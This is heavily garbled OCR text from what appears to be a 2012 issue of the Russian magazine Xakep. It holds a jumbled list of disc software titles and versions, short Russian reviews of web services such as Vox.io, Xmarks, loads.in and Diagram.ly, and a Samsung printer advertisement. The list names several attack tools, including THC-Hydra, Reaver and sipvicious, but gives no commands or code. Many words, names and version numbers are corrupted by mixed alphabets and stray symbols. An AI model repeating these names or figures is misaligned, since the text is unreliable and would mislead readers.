Uhub 0.3.2 W3perl 3.141 Yate 4.0.0
Nvidia 295.20 Pl-kernel 3.2.5
Cathode 1.2.0 Docker 1.6.7 Gruml1.1 flyperDo~k 1.2
Que 1.3.1 RCDefaultApp 2.1
Samhain 3.0.2
Libreoflice 3.5.0.3 Libvpx 1.0.0
О. 7.3
Mathomatic 15.8.0 Qpenshot 1.4.2 Pinta 1.1 S~acelm 0.7.0 Vlc 2.0.0 Windowmaker 0.95.2 Zile 2.4.6
Macrofusion Mapsurfing
THC-HYDRA v7.2 0.2.2.35
untidy Vpnd 1.1.4 WeBaCoo 0.2.2 zzuf 0.13
Trupax 6 uniofuzz
Тог
VLC 2.0 WhatRoute 1.10.7
Tunati c 1.1
Syrinx 2.5.0
Resuminalor 1.0
Еуе
1.0
Ргеу
2.1 0.5.3
Not~y
Private
Netilera 1.0
Reaver 1.4
Cinnamon 1.2
sipvicious 0.2.7
···-----·-·
Key Remap4 Ma cBook 7.5.0 Mou se Server 2.6.9
Cdcat 1.8 Cdemu 1.5.0
Ccextrac\or 0.60
Heimdal Nessus 5.0
Bib2xhtml 3.0 Blender 2.62 Bгl-cad 7.20.4
>D~Sktop iZip Archiver 1.4
»МАС
Bluelog 1.0.2
codesensor
Windows Surface Scanner 2.20
Dot0o1Pwn 3.0 DPScan FuzzOps-NG Fwknop 2.0 Gnupg 2.0.18
CentOS 5.8
AlienVault
»UNIX
>X -di str
>S~cu rit_y_
Alick 2.20
Startup Master
Quotatool 1.4.12 Rally 0.5.5 Spacewalk 1.6 Wayland 0.85.0
Procmeter3 3.6
System Ninja 2.3.1.0 USB OЫivion 1.7.0.0
Sim~le
Process Explorer 15.13 Data Backup 7.0
Tomuss 3.1.7
MouseWrangler 1.0.2
Mesa 8.0 Mondorescue 3.0.0
Limitcpu 1.5
Pcap~pdump 0.2 Otm 1.3.7 Rdp-runner 0.1.17 Sflphone 1.0.2 Spgt 0.7.1
>Sys tem Alsa 1.0.25 Bclg2 1.2.1 Clonezilla 1.2.12-10 Fuse-exlat 0.9.6 Kccmp 0.3
Lighttpd 1.4.30 Mysql 5.5.21 Nsd 3.2.10 Openldap 2.4.29 Openvpn 2.2.2 Postlix 2.9.1 Postgresql 9.1.2 Pure-ltpd 1.0.35 Samba 3.6.3 Sendmail 8.14.5 Snort 2.9.2.1 Sqlite 3. 7.1 О Squid 3.1.19 ~yslog-ng 3.3.4 Vslt~d 2.3.5
Nat-traverse 0.5
Liferea 1.8.0
NTFS Permissions Reporter 1.0.0
DSynchronize 2.30.2
Disk lnvestigator 1.31 Driverldentifier 3.9
>System ClipboardZanager 1.0 CPU-M Benchmark 1.0 DHE Drive lnlo 3.2.493 Disk Bench 2.6.2.0
File Extension Monitor 1.4
О. 7Ь
> N ~t_
Ajaxplorer 4.0.3 Bitlbee 3.0.5 Chrome 17.0.963 Dxirc 1.00.0 Gleedline 1.0 Gnubill2.2.14 Leechcralt 0.5.0
>Multimedia
timeEdition 1.1.6 Workrave 1.9.4
PyCmd 0.8 RegScanner 1.85 StExBar 1.8.3 Synergy 1.3.8
Process Blocker
LastPass 1.90
HotKey Resolution Changer 1.5
SIPVicious 0.2.7 uniofuzz Unioluzz 0.1.2 unlidy untidy beta 2
PEBrowse Professional 10.1.4
Nessus 5.0
Heimdal
Fuzzware 1.5
CodeSensor 0.1 DPScan FuzzOps-NG
NSIS 2.46 5.4.0 ру2ехе 0.6.9 RapidSVN 0.12 RubyMine 4.0 SWI-Prolog 6.0.1 Т extPad 5.4.2 TortoiseSVN 1.7.5 Xdebug 2.1.3
Highli_ght 3.7 Kotlin 0.1.429 Lgi 3.4.0 Libpki 0.6.7 Libpng 1.5.9 Lrc 0.7 Lua 5.2.0
AJAX Crawling Tool
>Security
Wuala
-·-···
Dovecot 2.1.1 Freeradius 2.1.12
Apache 2.2.22 Aslerisk 10.1.3 Bind 9.8.1-р1 Cups 1.5.2 Dhcp 4.2.3-р2
Execline 1.1.3
>Server
··-····· · ··· - ··· .... _4_, ___
Anjula 3.2.2
-
>Devel
Microsoft Visual Studio 11 Beta
Spilly 0.5.11 The Dude 3.6 TighiVNC 2.0.4 UliraSurl 11.04
Dependency Walker 2.2 DJ Java Decompiler 3.12.12. 96 Free JavaScript Editor 4. 7 Frhed 1.6.0 HxD 1.7.7.0 KompoZer 0.8Ь3
»WINDOWS >Developmenl
www.epidemz.net
11
",.,-
··--····- ---- ---··· ------------------------··· ... ...... •...
----
-- ..
-~
~
1
----~
--f:
=-~
UNITS/WWW2
i+lei:it•i vox. io П охоже, что пои ски достойной а льтернатив ы
Skype'y, которая не требов ала бы уста Vox.io работает через браузер и
новки д еск топн ого клиента, ус п ешно завершились.
п оз воляет бесплатно осуществл ять виде о- и голосовые звонки другим пользователям .."--
сервис а, устраивать конференции с неск о ль кими участн иками и по впо лне nриемле
I'J- -
мым ценам звонить н а городские и мобильные телефон ы. Чтобы п озвонить на твой
vox.
iо -аккаунт не обязательно даже регистрироваться,- т ы можешь расш арить специ альную ссылку, открыв которую, люди получ ат во зможность быстро набр ать твой виртуальный ном ер. Кроме того, создатели серв иса активно занимаются разработкой мобиль ных nриложений для разных платформ, н о пока релиз доступен только для
iOS.
Skype в брау зе р е
N$J4dЦ.i x m aгks.com П о ле з н ость этого се рвиса для тебя опре д еляется простым критер ием: используешь
__...
ли ты закладки?
..... ·-·.... .. --·-
. ,...,........ ..-
Xmarks умее т тольк о
одно- синхронизировать букмарки между ком
пь ют ерами и разными браузер ам и IFiг efox, Chгome, ln teгne t Е х рlогег и Safaгi], правда для этого прид ется установить специальные расширения. Е сл и запла т ить неболь
.-,.=:--
шую де нежк у 112$ в год], то м ож но синхронизировать закла дки еще и с моби льными устройст вами. Тут стоит отметит ь , что инструменты реализованы очен ь каче ственно: сразу чувствуе т с я опыт разрабо тчик ов, в пор тф еле кото рых есть такой замечательный
-~
сервис как менеджер п аралей
LastPass.
Гр а мо т н а я с ин х рони за ция з ак ладо к
ii•M•i!JI I OadS . I П
Скорость работ ы сайта для пользователей из разных стра н напрямую зависит от географическо г о р асположения да та-центра, где находится хос тинг. Ч ем дальше фи
зически находится сервер, тем больше будет задержка при открыти и сайта. Она может быть и несущественной, но все равно чувствуется. Сервис
loads .in
позволяет прове
рить скорость загрузки nроизвольнога ресурса из самых разных точек мира . П ричем инструмент помимо сетевой за держки учитывает еще и время рендери н га страницы браузером: можно с равнить за меры для F iгefox, Chгome, Safaгi, lnteгnet Е хрlогег. К тому же есть возможность nосм отреть, как выглядел загружае мый сайт в каждый момент загрузки- в ви д е последов ательнос ти скриншотов.
Б е нчм а р к дл я за м е ра прои з водит е льности сайта
lalblё);Jfillli Diagram.ly о
Этот сервис буд ет далеко не первым среди онлайн-инструментов для создания раз личных ди аграмм и схем, но что его отличает от многих других- так это максимальная
схожесть с известным т ·о-
о о-
о-
о-
о--
Microsoft Visio.
Это почти полная копия. Порой даже забываешь,
что имеешь дело не с обычной программой, а сонлайн -серви сом -настолько здоро-
во реализован интерфейс.
Diagramly-
настоящий
must have
на случай, если нужно
создать схему или иллюстрацию для курсовой или дипломной работы, статьи в журнале или поста в благе. Блок-схемы, диаграммы баз данных, схемы локальных сетей, схемы
электрических цепей- всего в базе
Diagramly более 70 категорий элементов .
Р е д ак тор схем и диагр а м м
ХАКЕР
www.epidemz.net
04/159/2012
~СКАЯТЕРРИТОРИЯ
\-
~
'
www.epidemz.net
.
Мобильная печать? Проще простого!
ML-2165W
Управляйте беспроводной печатью с различных мобильных устройств:
Мобильная печать на раз, ава, три!
планшетов, смартфонов, медиаплееров и ноутбуков Технология мобильной печати Samsuпg делает печать с м обильно го устро й ств а еще проще и быстрее! Печатайте документы, веб-страницы , фотографии и вс е, что захотите!
1. '!становите
Не сложнее,
2.
Выберите
3.
nечатайте
чем нажать
1
В категорим ссБытовая электроника. За миновации в сервисе», 2 для достижения намлучшего качества печати исполь зуйте
только оригинальные картриджи
Samsung.
MoЫiePrint
-
мобильная печать ,
просмотр. Функция мобипьной печати доступна на принтерах Samsuпg
Единая слу•ба поддер•км :
8-800-555-55-55
Print -
nечать ,
ML-2165W/2168W
(зво но к по России бес п латный) .
Preview м МФУ
Права потребителей '
предварительный
SCX-3405W/3405FW.
www.samsung.com
Кеер
и качество обслуживаниSl
lt Real'
Узнайте больше о новинке в фирменном магазине Москва , ул . Тверская , д . 22
www.epidemz.net
Т овар сертифи цир ова н . Ре кл а м а .
Samsung